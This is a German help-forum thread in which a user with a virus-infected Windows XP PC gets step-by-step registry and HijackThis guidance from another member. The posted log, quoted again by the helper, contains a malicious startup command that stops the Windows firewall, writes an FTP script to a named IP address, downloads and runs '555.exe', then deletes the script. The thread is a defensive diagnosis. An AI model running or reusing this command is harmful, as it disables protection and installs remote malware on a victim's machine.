CMD.exe - Inhalt - Befehle ändern ?

[H1J2K3]

Ich grüsse Euch alle,

Problem ist: Ein Virus hat meinen PC angegriffen. Seitdem befindet sich ein Eintrag in der CMD, der aber als Fehler
vermerkt wurde !
Ich kann mir über: start, ausführen - CMD, den Inhalt ansehen, ein Curser blinkt ganz aufgeregt - habe es auch mit Enter geschafft, dass der davor vorhandene Befehl noch einmal kopiert und so nun zweimal dasteht.
Es muss doch irgendwie möglich sein, da den Inhalt oder die Befehle zu ändern, zu löschen oder neue einzugeben.
Wer ist so kompetent und freundlich?
Ich bin zufrieden, dass ich seit rund 6 Jahre keine externe Hilfe in Anspruch nehmen musste. Oft stand ich schon kurz vorm Verzweifeln, habe mich dann aber irgendwie selbst befreien können.
Diesmal brauche ich aber mal eine Hilfe.
Vielen Dank im Voraus !

[Lemmi]

Könntest uns mal ein Screenshot vom aktuellen Stand anfertigen und hier posten.

[H1J2K3]

Screenshot, habe ich schon irgendwo gehört, eine Kopie von (?) - bin ehrlich aber nicht sicher was damit gemeint ist! Eine Kopie von den CMD-Einträgen? Da trau ich mich schon nicht mehr rein - smile!

[Lemmi]

Ein Scrrenshot von dem anfertigen was Du siehst ... Derzeit kann sich keiner Vorstellen wo Dein Problem liegt. Jedenfalls werde ich nicht schlau daraus wo Dein Problem liegt. Also einfach mal die Drucktaste drücken und das Bild in ein Bildbearbeitungsprogramm einfügen und hier mittels der Option Grafik einfügen mal anhängen.

[H1J2K3]

Hier "poste" ich mal auf Verdacht:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
Der Befehl "?‼?‼S-1-5-21-1454471165-1482476501-839522115-1003" ist entweder fals
ch geschrieben oder
konnte nicht gefunden werden.

C:\Dokumente und Einstellungen\H.J.K.H-TQTW94T5YW9SP>

. . . und es blinkt immer noch, aber was nun gut ist: da ich ja nicht weiss wie man eine Änderung speichert, ist der Eintrag so geblieben.
Habe mit Rechtsklick alles markiert und kopiert !

[Tilo2300]

Shalom!

Auf den Hinweis, dass nach einem Virenbefall zu einer kompletten Neuinstallation des Systems zu raten ist, verzichte ich hier mal.
Habe mir gerade damit quasi selbst wiedersprochen und dir unterschwellig vermittelt, was das beste wäre. (NLP läßt grüßen )

Sorry, no offense, aber du redest etwas wirr.
"In der CMD" kann man keinen "Inhalt ansehen", und da gibt es so auch keine "Änderung zu speichern".

Dein Kommandozeileninterpreter wird mit einem wahrscheinlich durch den Virus verursachten Befehl gestartet, der
a) normalerweise nicht dort hin gehört
b) dankenswerterweise mittlerweile ins Leere läuft... daher die Fehlermeldung.

Öffne mal den Registrierungs-Editor (Start -> Ausführen -> regedit.exe)
und hangel dich in der Baumstruktur zu den Schlüsseln

HKEY_CURRENT_USER\Software\Microsoft\Command Processor

und

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor

wenn du den jeweiligen Schlüssel ("Ordner") anklickst, schau mal, ob in der rechten Fensterhälfte ein Eintrag namens "Autorun" mit "komischem" Inhalt steht.
Wenn "Autorun" vorhanden ist, sollte der Wert eigentlich leer sein (siehe Screenshot).




Möglicherweise steht dort in "Autorun" auch ein Link zu einer BAT- oder CMD- oder EXE-Datei drin.
Dann stelle sicher, daß diese Datei gelöscht wurde (hat dein Virenscanner wahrscheinlich schon getan, weil ja eine Fehlermeldung kommt).
Durch einen Doppelklick auf "Autorun" kannst du den Eintrag ändern... lösche einfach, was drin steht.


Wenn das nicht hilft, wähle mal den allerobersten Schlüssel im Registry-Editor (er heißt "Arbeitsplatz", warum auch immer), klicke auf Bearbeiten -> Suchen und suche nach "?‼?‼", also diesem komischen Teilstring, der da bei dir im CMD-Fenster erscheint. Das "S-1-5-21-1454471165-1482476501-839522115-1003" würde ich bei der Suche weglassen, denn das sieht mir nach einer User-ID aus, die eventuell durchaus vorhanden sein kann und auch darf.
Wenn du aber bei deiner Suche auf
"?‼?‼S-1-5-21-1454471165-1482476501-839522115-1003"
stößt, hat das dort mit Sicherheit nichts zu suchen.

Wenn du nirgends dort fündig wirst, schau dir mal die Dateien
C:\Windows\System32\CONFIG.NT
und
C:\Windows\System32\AUTOEXEC.NT
mit einem Texteditor an.
Dort steht eine Menge Zeugs drin, wovon das meiste aber durch "REM" auskommntiert ist.
Eventuell findest du hier deinen komischen Eintrag.


Wenn du das durch hast, melde dich noch mal zurück, und sag, ob sich was ergeben hat.
Wenn nicht, müssen härtere Geschütze her.



Nebenbei:
Screenshots (= Foto von deinem Bildschirm) erstellst du, indem du die DRUCK-Taste auf deiner Tastatur drückst (i. d. R. irgendwo oben rechts bei PAUSE und ROLLEN.
Damit wird dein Bildschirminhalt als Grafik in die Zwischenablage gelegt.
Zusammen mit der ALT-Taste gedrückt, wird nur das momentan aktive Fenster in die Zwischenablage gelegt, nicht der ganze Bildschirm. Letzteres macht meistens mehr Sinn.
Wenn du jetzt ein Bildbearbeitungsprogramm öffnest
(bei Windows ist z. B. immer mspaint.exe dabei, Start -> Programme -> Zubehör -> Paint)
und auf Bearbeiten -> Einfügen klickst, kannst du das Bild speichern.
Aber bitte nicht als BMP, das ist unkomprimiert und zu groß.
Nimm JPG oder PNG.
Dann kannst du hier im Forum unter deinem Posting auf "Anhänge verwalten" klicken und die gespeicherte Bilddatei hochladen.
Im Veraltungsfenster für Anhänge kannst du dann das BIld oder die Bilder anhaken und mit der Schaltfläche unten rechts in dein Posting einfügen.

[H1J2K3]

Hallo Tilo2300,
zuerst mal ein "Dankeschön", bin begeistert! So eine ausführliche Anteilnahme ist bewundernswert!
1. im Regedit habe ich keinen entsprechenden Eintrag oder Hinweis finden können,
2. auch nicht in den Dateien: Config.nt & Autoexec.nt
nur in der Config.nt befindet sich der Hinweis:
NTCMDPROMPT
REM Wenn Sie von einem TSR-Programm oder einer MS-DOS-Anwendung aus
REM zur Eingabeaufforderung zurückzukehren, führt Windows
REM COMMAND.COM aus. Dadurch bleibt das TSR-Programm aktiv. Um den
REM Windows-Befehlsinterpreter CMD.EXE (statt COMMAND.COM) auszu-
REM führen, müssen Sie den Befehl "NTCmdPrompt" zu der Datei
REM CONFIG.NT oder einer anderen Initialisierungsdatei hinzufügen.
- hat aber mit dem Problem nichts am Hut!
Zu Deiner Bewertung und zum Widerspruch, - es ist leider so wie ich es darstelle - sonst könnte ich wohl keine Hilfe erwarten!
Antivir hat die Viren gefunden und danach wurde mir nach dem Systemstart immer nur kurz die geöffnete CMD-Datei angezeigt, ohne dass ich den Inhalt richtig entziffern konnte. Es gab auch mehrere Abstürze, das System stand einfach und nix rührte sich, mehrere Neustarts, Runterfahren giung nicht, musste den Netzstecker ziehen, beim Neustart kamen dann gleich mehrere Piepser, konnte manchmal nur über F1 wieder Starten.
Dann habe ich aber auch endlich mal den Fehler-Eintrag lesen dürfen. Es sind in der CMD noch weitere Einträge vorhanden, die ich aber über Start-ausführen nicht finde! (?) Nun wollte ich nur wissen, wie ich diesen Fehler-Eintrag beseitigen kann.
Im Bezug auf den PC, trennen uns Welten. Aber ich bin neugierig, zweifel da manchmal an meiner Lernfähigkeit und staune nur über das Wissen wa hie so allgemein vermittelt wird. Man(n) lernt ja bis der Deckel zugenagelt wird.

[Tilo2300]

Du könntest nochmal nachsehen, ob in der Registry unterhalb von
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
noch ein Unterschlüssel (Ordner) "cmd.exe" existiert.
Wenn ja, diesen löschen.

Da das jetzt ausufern könnte, erstelle doch mal ein HijackThis-Log von deinem System und poste es hier her... oder in ein einschlägiges HijackThis-Forum.
HijackThis Logfileauswertung

Damit sollte man dem Übeltäter schneller auf die Spur kommen.
Alles andere würde per Ferndiagnose ohne Zugriff auf das betroffene System wahrscheinlich sehr langwierig.
Eine Fernwartung deines Systems durch einen versierten Techniker via Internet wäre noch eine praktikable Herangehensweise.
Ich mache sowas beruflich, will aber dieses Forum hier jetzt nicht als Werbeplattform mißbrauchen.
Aber wenn ich's unentgeltlich als privaten Freundschaftsdienst anbieten würde, ginge das wahrscheinlich in Ordnung .

Eventuell könnte dir auch das Tool "Autoruns" von Sysinternals (mittlerweile von Microsoft aufgekauft) helfen. Es zeigt dir fast alle Einträge in deinem System an, die in irgendeiner Form automatisch gestartet werden. Vielleicht ist dein Eindringling ja dabei.

[H1J2K3]

Hallo Tilo2300,
an der Stelle gibt es auch keinen Eintrag!
Aber nun habe ich inzwischen Deinen Hinweis befolgt. HijackLog.
HijackThisLog

30. Juni 2011

HijackLog


Automatische Auswertung Ihres HijackThis Logfiles
Windowsupdate Seite um sich das neuste Service Pack herunterzuladen.
In Ihrem Logfile findet sich kein aktiver Prozess, der auf eine aktive Firewall hindeutet. Mögliche Gründe1.) Sie benutzen eine Firewall, die in Ihr Betriebssystem integriert und im Logfile nicht zu erkennen ist bzw. eine Hardware-Firewall.(2.) Sie benutzen eine Firewall, die uns nicht bekannt ist.(3.) Zur Zeit ist keine Firewall auf ihrem System aktiv oder(4.) sie verwenden keine Firewall.Wir empfehlen Ihnen das Benutzen einer Firewall. Laden Sie sich ggf. eine herunter oder verwenden Sie die Windows XP eigene. Aktivieren Sie ggf. Ihre Firewall. Wenn Sie eine uns unbekannte Firewall verwenden, melden Sie das bitte ! - - - Microsoft/Windows Firewall & Antivir ist aktiviert !
Aktionen Meldung Art Besucherbewertung Information
Logfile of Trend Micro HijackThis v2.0.4 Ihre Version sollte aktuell sein.
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702) Ihre Version sollte aktuell sein.
Boot mode: Normal Sehr sicher Dieser Eintrag wurde von unseren Besuchern als gut eingestuft.
d:\PROGRA~1\MICROS~3\MSSQL\binn\sqlagent.exe Eventuell schädlich! Laut unserer Datenbank läuft dieser Prozess nomalerweise in c:\programme\mssql7\binn\! überprüfen Sie, ob Sie die Datei kennen und führen Sie ggf. einen Virencheck durch.
C:\WINDOWS\system32\wuauclt.exe Neutral Windows Update AutoUpdate Client

D:\PROGRA~1\MICROS~4\Office\OUTLOOK.EXE Eventuell schädlich! Laut unserer Datenbank läuft dieser Prozess nomalerweise in c:\programme\microsoft office\office11\! überprüfen Sie, ob Sie die Datei kennen und führen Sie ggf. einen Virencheck durch. E-Mail Client für Windows.

D:\Programme\Trend Micro\HiJackThis\HiJackThis.exe Bedenken Sie, dass HijackThis in einem eigenen Ordner laufen muss. Nur so können Backups erstellt werden! Tool, mit dem sie dieses Logfile erzeugt haben. Das Programm sollte so angelegt sein ! C:\Programme\HijackThis\HijackThis.exe

R3 - URLSearchHook: (no name) - {00000000-6E41-4FD3-8538-502F5495E5FC} - (no file) Schädlich Sollte gefixt werden, wenn kein (bekanntes) Programm in der Fehlermeldung steht. Dieser Eintrag wurde von unseren Besuchern als schädlich eingestuft.

O2 - BHO: Google Dictionary Compression sdch - {C84D72FE-E17D-4195-BB24-76C02E2E7C4E} - (no file) Neutral Nicht bekanntes Programm.Unnötiger (unwirksamer) Eintrag der entfernt werden kann!

O4 - HKLM\..\Run: [shell] c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 60.169.73.87> cmd.txt&echo sa>> cmd.txt&echo sa>> cmd.txt&echo binary >> cmd.txt&echo get 555.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&555.exe&555.exe&del cmd.txt /q /f& Schädlich (1.5 / 5.00)

O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'LOKALER DIENST') Neutral Office related

O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present Neutral Fixen, wenn nicht bewusst herbeigeführt! Insofern nicht in dem kostenlosen Anti-Spyware-Tool die Option 'Lock homepage from changes' aktiviert wurde, ist dieser Eintrag mit HijackThis zu fixen.

O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel present Neutral Fixen, wenn nicht bewusst herbeigeführt! Insofern nicht in dem kostenlosen Anti-Spyware-Tool die Option 'Lock homepage from changes' aktiviert wurde, ist dieser Eintrag mit HijackThis zu fixen.

- Ich habe hier nur die Einträge kopiert, die interessant sein könnten! Nun bin ich neugierig auf Deine Beurteilung.
Ich bin sicher, Du kannst damit was anfangen?

Erst nochmal vielen Dank bis hierher,
MfG. H.J.K.

[Tilo2300]

O4 - HKLM\..\Run: [shell] c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 60.169.73.87> cmd.txt&echo sa>> cmd.txt&echo sa>> cmd.txt&echo binary >> cmd.txt&echo get 555.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&555.exe&555.exe&del cmd.txt /q /f& Schädlich (1.5 / 5.00)

Na, das sieht doch aus, als hätten wir da was!
Und was Ekliges noch dazu.

Beim Starten wird durch diesen Eintrag automatisch deine Windows-Firewall abgeschaltet:
c:\windows\system32\cmd.exe /c net1 stop sharedaccess

Dann wird versucht, aus dem Internet eine Datei namens 555.exe herunterzuladen und auszuführen.
Wer weiß, was die anstellt!?!

Durchsuche sicherheitshalber mal dein komplettes System (auch versteckte und Systemdateien!) nach dieser ominösen "555.exe" und lösche sie, falls sie noch oder wieder existiert.

Dann durchsuche deine Registry wie neulich schon, diesmal nach dem Eintrag "555.exe", damit solltest du den Eintrag finden... dein in deinem Log steht nur
HKLM\..\Run: [shell]
Wie der komplette Pfad lautet, kann ich wegen der Pünktchen nicht sehen.

Das dürfte der Strolch sein.

P.S.:

Auf den Hinweis, dass nach einem Virenbefall zu einer kompletten Neuinstallation des Systems zu raten ist, verzichte ich hier mal.